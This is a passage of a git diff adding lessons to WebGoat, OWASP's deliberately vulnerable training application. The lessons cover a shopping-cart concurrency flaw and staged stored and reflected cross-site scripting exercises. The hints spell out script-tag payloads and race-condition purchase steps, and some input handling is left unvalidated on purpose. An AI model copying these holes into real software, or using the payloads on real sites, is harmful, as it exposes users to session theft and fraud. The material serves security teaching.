+		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
+		    table.addElement(tr);
+
+	    ec.addElement(table);
+
+	    table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
+		    .setWidth("90%").setAlign("center");
+
+	    if (s.isColor())  
+	       {  table.setBorder(1); }
+
+	    ec.addElement(new BR());
+	    
+	    //Purchasing Amount
+	    tr = new TR();
+	    tr.addElement(new TD().addElement("Total: " +"$" +formatInt(subTOTAL) +".00").setAlign("left"));
+	    table.addElement(tr);
+
+	    //Update Button
+		    Element b = ECSFactory.makeButton("Update Cart");
+		    tr = new TR();
+		    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
+		    table.addElement(tr);
+
+	    
+	    tr = new TR();
+	    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+	    table.addElement(tr);
+	    
+	    //Purchase Button
+		    Element c = ECSFactory.makeButton("Purchase");
+		    tr = new TR();
+		    tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right"));
+		    table.addElement(tr);
+
+	    ec.addElement(table);
+	    ec.addElement(new BR());
+		    
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return (ec);
+    }
+
+    String formatInt (int i)
+    {
+	NumberFormat intFormat =
+	      NumberFormat.getIntegerInstance(Locale.US);
+	return intFormat.format(i);
+    }
+
+    String formatFloat (float f)
+    {
+	NumberFormat floatFormat =
+	      NumberFormat.getNumberInstance(Locale.US);
+	floatFormat.setMinimumFractionDigits(2);
+	floatFormat.setMaximumFractionDigits(2);
+	return floatFormat.format(f);
+    }
+
+    int thinkPositive(int i)
+    {
+	if (i < 0 )
+		return 0 ;
+	else
+		return i ;
+    }
+
+    /**
+     *  DOCUMENT ME!
+     *
+     * @return    DOCUMENT ME!
+     */
+    protected Category getDefaultCategory()		{  return Category.CONCURRENCY;  }
+       
+    /**
+     *  Gets the hints attribute of the AccessControlScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	  hints.add("Can you purchase the merchandise in your shopping cart for a lower price?");
+	  hints.add("Try using a new browser window to get a lower price.");
+	  hints.add("In window A, purchase a low cost item, in window B a high cost item.");
+	  hints.add("In window A, commit after updating cart in window B.");
+
+	return hints;
+    }
+ 
+    /**
+     *  Gets the instructions attribute of the WeakAccessControl object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.";
+	return (instructions);
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(120);
+
+    protected Integer getDefaultRanking()	{  return DEFAULT_RANKING;  }
+
+
+    /**
+     *  Gets the title attribute of the AccessControlScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()		{  return "Shopping Cart Concurrency Flaw";  }
+    
+    public Element getCredits()		{  return super.getCustomCredits("", ASPECT_LOGO);  }
+}
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java
new file mode 100644
index 000000000..c848a8b91
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java
@@ -0,0 +1,306 @@
+package org.owasp.webgoat.lessons.CrossSiteScripting;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.ListStaff;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.Login;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+
+/**
+ /*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ */
+public class CrossSiteScripting extends GoatHillsFinancial
+{
+    private final static Integer DEFAULT_RANKING = new Integer(100);
+
+    public final static String STAGE1 = "Stored XSS";
+    
+    public final static String STAGE2 = "Block Stored XSS using Input Validation";
+    
+    public final static String STAGE3 = "Stored XSS Revisited";
+    
+    public final static String STAGE4 = "Block Stored XSS using Output Encoding";
+    
+    public final static String STAGE5 = "Reflected XSS";
+    
+    public final static String STAGE6 = "Block Reflected XSS";
+    
+    protected void registerActions(String className)
+    {
+	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+	// These actions are special in that they chain to other actions.
+	registerAction(new Login(this, className, LOGIN_ACTION,
+		getAction(LISTSTAFF_ACTION)));
+	registerAction(new Logout(this, className, LOGOUT_ACTION,
+		getAction(LOGIN_ACTION)));
+	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
+		getAction(VIEWPROFILE_ACTION)));
+	registerAction(new UpdateProfile(this, className,
+		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+	registerAction(new DeleteProfile(this, className,
+		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
+    }
+
+    /**
+     *  Gets the category attribute of the CrossSiteScripting object
+     *
+     * @return    The category value
+     */
+    public Category getDefaultCategory()
+    {
+	return Category.XSS;
+    }
+
+    /**
+     *  Gets the hints attribute of the DirectoryScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+
+	// Stage 1
+	hints.add("You can put HTML tags in form input fields.");
+	hints
+		.add("Bury a SCRIPT tag in the field to attack anyone who reads it.");
+	hints
+		.add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in message fields.");
+	hints
+		.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in message fields.");
+
+	// Stage 2
+	hints
+		.add("Many scripts rely on the use of special characters such as: &lt;");
+	hints
+		.add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering).");
+	hints
+		.add("The java.util.regex package is useful for filtering string values.");
+
+	// Stage 3
+	hints
+		.add("Browsers recognize and decode HTML entity encoded content after parsing and interpretting HTML tags.");
+	hints
+		.add("An HTML entity encoder is provided in the ParameterParser class.");
+
+	// Stage 4
+	hints
+		.add("Examine content served in response to form submissions looking for data taken from the form.");
+
+	// Stage 5
+	hints
+		.add("Validate early.  Consider: out.println(\"Order for \" + request.getParameter(\"product\") + \" being processed...\");");
+
+	return hints;
+    }
+
+
+    /**
+     *  Gets the instructions attribute of the ParameterInjection object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "";
+
+	if (!getLessonTracker(s).getCompleted())
+	{
+		String stage = getStage(s);
+		if (STAGE1.equals(stage))
+	    {
+		    instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br>"
+			    + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
+			    + "Verify that 'Jerry' is affected by the attack.";
+	    }
+		else if (STAGE2.equals(stage))
+		{
+		    instructions = "Stage 2: Block Stored XSS using Input Validation.<br>"
+			    + "Implement a fix to block the stored XSS before it can be written to the database. "
+			    + "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
+		}
+		else if (STAGE3.equals(stage))
+		{
+		    instructions = "Stage 3: Execute a previously Stored Cross Site Scripting (XSS) attack.<br>"
+			    + "The 'Bruce' employee profile is pre-loaded with a stored XSS attack. "
+			    + "Verify that 'David' is affected by the attack even though the fix from stage 2 is in place.";
+		}
+		else if (STAGE4.equals(stage))
+		{
+		    instructions = "Stage 4: Block Stored XSS using Output Encoding.<br>"
+			    + "Implement a fix to block XSS after it is read from the database. "
+			    + "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack.";
+		}
+		else if (STAGE5.equals(stage))
+		{
+		    instructions = "Stage 5: Execute a Reflected XSS attack.<br>"
+			    + "Use a vulnerability on the Search Staff page to craft a URL containing a reflected XSS attack.  "
+			    + "Verify that another employee using the link is affected by the attack.";
+		}
+		else if (STAGE6.equals(stage))
+		{
+		    instructions = "Stage 6: Block Reflected XSS using Input Validation.<br>"
+			    + "Implement a fix to block this reflected XSS attack. "
+			    + "Repeat step 5.  Verify that the attack URL is no longer effective.";
+	    }
+	}
+
+	return instructions;
+
+    }
+
+    @Override
+	public String[] getStages() {
+    	if (getWebgoatContext().isCodingExercises())
+    		return new String[] {STAGE1, STAGE2, STAGE3, STAGE4, STAGE5, STAGE6};
+    	return new String[] {STAGE1, STAGE3, STAGE5};
+	}
+
+    public void handleRequest(WebSession s)
+    {
+	if (s.getLessonSession(this) == null)
+	    s.openLessonSession(this);
+
+	String requestedActionName = null;
+	try
+	{
+	    requestedActionName = s.getParser().getStringParameter("action");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // Let them eat login page.
+	    requestedActionName = LOGIN_ACTION;
+	}
+
+	if (requestedActionName != null)
+	{
+	    try
+	    {
+		LessonAction action = getAction(requestedActionName);
+
+		if (action != null)
+		{
+		    if (!action.requiresAuthentication()
+			    || action.isAuthenticated(s))
+		    {
+			action.handleRequest(s);
+			//setCurrentAction(s, action.getNextPage(s));
+		    }
+		}
+		else
+		{
+		    setCurrentAction(s, ERROR_ACTION);
+		}
+	    }
+	    catch (ParameterNotFoundException pnfe)
+	    {
+		System.out.println("Missing parameter");
+		pnfe.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (ValidationException ve)
+	    {
+		System.out.println("Validation failed");
+		ve.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (UnauthenticatedException ue)
+	    {
+		s.setMessage("Login failed");
+		System.out.println("Authentication failure");
+		ue.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		s.setMessage("You are not authorized to perform this function");
+		System.out.println("Authorization failure");
+		ue2.printStackTrace();
+	    }
+	    catch (Exception e)
+	    {
+		// All other errors send the user to the generic error page
+		System.out.println("handleRequest() error");
+		e.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	}
+
+	// All this does for this lesson is ensure that a non-null content exists.
+	setContent(new ElementContainer());
+    }
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the CrossSiteScripting object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return "LAB: Cross Site Scripting";
+    }
+
+	public String htmlEncode(WebSession s, String text)
+	{
+		if (STAGE4.equals(getStage(s)) && 
+				text.indexOf("<script>") > -1 && text.indexOf("alert") > -1 && text.indexOf("</script>") > -1)
+		{
+			setStageComplete(s, STAGE4);
+			s.setMessage( "Welcome to stage 5 -- exploiting the data layer" );
+		}
+		
+		return HtmlEncoder.encode(text);
+	}
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java
new file mode 100644
index 000000000..605fa82dc
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java
@@ -0,0 +1,195 @@
+package org.owasp.webgoat.lessons.CrossSiteScripting;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class EditProfile extends DefaultLessonAction
+{
+
+    public EditProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	if (isAuthenticated(s))
+	{
+	    int userId = getUserId(s);
+	    int employeeId = s.getParser().getIntParameter(
+		    CrossSiteScripting.EMPLOYEE_ID);
+
+	    Employee employee = getEmployeeProfile(s, userId, employeeId);
+	    setSessionAttribute(s, getLessonName() + "."
+		    + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee);
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return CrossSiteScripting.EDITPROFILE_ACTION;
+    }
+
+
+    public Employee getEmployeeProfile(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = ?";
+
+	    try
+	    {
+		PreparedStatement answer_statement = WebSession
+			.getConnection(s).prepareStatement(query,
+				ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		answer_statement.setInt(1, subjectUserId);
+		ResultSet answer_results = answer_statement.executeQuery();
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+
+    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = ?";
+
+	    try
+	    {
+		PreparedStatement answer_statement = WebSession
+			.getConnection(s).prepareStatement(query,
+				ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		answer_statement.setInt(1, subjectUserId);
+		ResultSet answer_results = answer_statement.executeQuery();
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java
new file mode 100644
index 000000000..42bc14f07
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java
@@ -0,0 +1,256 @@
+package org.owasp.webgoat.lessons.CrossSiteScripting;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class FindProfile extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public FindProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName, LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + CrossSiteScripting.USER_ID);
+
+	    String searchName = null;
+	    try
+	    {
+		searchName = getRequestParameter(s,
+			CrossSiteScripting.SEARCHNAME);
+
+		Employee employee = null;
+
+		employee = findEmployeeProfile(s, userId, searchName);
+		if (employee == null)
+		{
+		    setSessionAttribute(s, getLessonName() + "."
+			    + CrossSiteScripting.SEARCHRESULT_ATTRIBUTE_KEY,
+			    "Employee " + searchName + " not found.");
+		}
+	    }
+	    catch (ValidationException e)
+	    {
+		if (CrossSiteScripting.STAGE6.equals(getStage(s)))
+		{
+		    setStageComplete(s, CrossSiteScripting.STAGE6);
+		}
+		throw e;
+	    }
+
+	    if (CrossSiteScripting.STAGE5.equals(getStage(s)))
+	    {
+		if (searchName.indexOf("<script>") > -1
+			&& searchName.indexOf("alert") > -1
+			&& searchName.indexOf("</script>") > -1)
+		{
+		    setStageComplete(s, CrossSiteScripting.STAGE5);
+		}
+	    }
+
+	    // Execute the chained Action if the employee was found.
+	    if (foundEmployee(s))
+	    {
+		try
+		{
+		    chainedAction.handleRequest(s);
+		}
+		catch (UnauthenticatedException ue1)
+		{
+		    System.out.println("Internal server error");
+		    ue1.printStackTrace();
+		}
+		catch (UnauthorizedException ue2)
+		{
+		    System.out.println("Internal server error");
+		    ue2.printStackTrace();
+		}
+	    }
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	String page = CrossSiteScripting.SEARCHSTAFF_ACTION;
+
+	if (foundEmployee(s))
+	    page = CrossSiteScripting.VIEWPROFILE_ACTION;
+
+	return page;
+    }
+
+
+    protected String getRequestParameter(WebSession s, String name)
+	    throws ParameterNotFoundException, ValidationException
+    {
+	return s.getParser().getRawParameter(name);
+    }
+
+
+    protected String getRequestParameter_BACKUP(WebSession s, String name)
+	    throws ParameterNotFoundException, ValidationException
+    {
+	return s.getParser().getRawParameter(name);
+    }
+
+
+    public Employee findEmployeeProfile(WebSession s, int userId, String pattern)
+	    throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE first_name like ? OR last_name like ?";
+
+	    try
+	    {
+		PreparedStatement answer_statement = WebSession
+			.getConnection(s).prepareStatement(query,
+				ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		answer_statement.setString(1, "%" + pattern + "%");
+		answer_statement.setString(2, "%" + pattern + "%");
+		ResultSet answer_results = answer_statement.executeQuery();
+
+		// Just use the first hit.
+		if (answer_results.next())
+		{
+		    int id = answer_results.getInt("userid");
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(id, answer_results
+			    .getString("first_name"), answer_results
+			    .getString("last_name"), answer_results
+			    .getString("ssn"), answer_results
+			    .getString("title"), answer_results
+			    .getString("phone"), answer_results
+			    .getString("address1"), answer_results
+			    .getString("address2"), answer_results
+			    .getInt("manager"), answer_results
+			    .getString("start_date"), answer_results
+			    .getInt("salary"), answer_results.getString("ccn"),
+			    answer_results.getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */
+		    setRequestAttribute(s, getLessonName() + "."
+			    + CrossSiteScripting.EMPLOYEE_ID, Integer
+			    .toString(id));
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error finding employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error finding employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+
+    private boolean foundEmployee(WebSession s)
+    {
+	boolean found = false;
+	try
+	{
+	    getIntRequestAttribute(s, getLessonName() + "."
+		    + CrossSiteScripting.EMPLOYEE_ID);
+	    found = true;
+	}
+	catch (ParameterNotFoundException e)
+	{}
+
+	return found;
+    }
+
+
+    protected String validate(final String parameter, final Pattern pattern)
+	    throws ValidationException
+    {
+	Matcher matcher = pattern.matcher(parameter);
+	if (!matcher.matches())
+	    throw new ValidationException();
+
+	return parameter;
+    }
+
+    protected static Map<String, Pattern> patterns = new HashMap<String, Pattern>();
+    static
+    {
+	patterns.put(CrossSiteScripting.SEARCHNAME, Pattern
+		.compile("[a-zA-Z ]{0,20}"));
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java
new file mode 100644
index 000000000..157a0e8b4
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java
@@ -0,0 +1,436 @@
+package org.owasp.webgoat.lessons.CrossSiteScripting;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.PreparedStatement;
+import java.sql.Statement;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+import javax.servlet.http.HttpServletRequest;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.ParameterParser;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class UpdateProfile extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public UpdateProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName, LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + CrossSiteScripting.USER_ID);
+
+	    int subjectId = s.getParser().getIntParameter(
+		    CrossSiteScripting.EMPLOYEE_ID, 0);
+
+	    Employee employee = null;
+	    try
+	    {
+		employee = parseEmployeeProfile(subjectId, s);
+	    }
+	    catch (ValidationException e)
+	    {
+		if (CrossSiteScripting.STAGE2.equals(getStage(s)))
+		{
+		    setStageComplete(s, CrossSiteScripting.STAGE2);
+		}
+		throw e;
+	    }
+
+	    if (subjectId > 0)
+	    {
+		this.changeEmployeeProfile(s, userId, subjectId, employee);
+		setRequestAttribute(s, getLessonName() + "."
+			+ CrossSiteScripting.EMPLOYEE_ID, Integer
+			.toString(subjectId));
+	    }
+	    else
+		this.createEmployeeProfile(s, userId, employee);
+
+	    try
+	    {
+		chainedAction.handleRequest(s);
+	    }
+	    catch (UnauthenticatedException ue1)
+	    {
+		System.out.println("Internal server error");
+		ue1.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		System.out.println("Internal server error");
+		ue2.printStackTrace();
+	    }
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+
+    protected Employee parseEmployeeProfile(int subjectId, WebSession s)
+	    throws ParameterNotFoundException, ValidationException
+    {
+	// The input validation can be added using a parsing component 
+	// or by using an inline regular expression. The parsing component 
+	// is the better solution.
+
+	HttpServletRequest request = s.getRequest();
+	String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
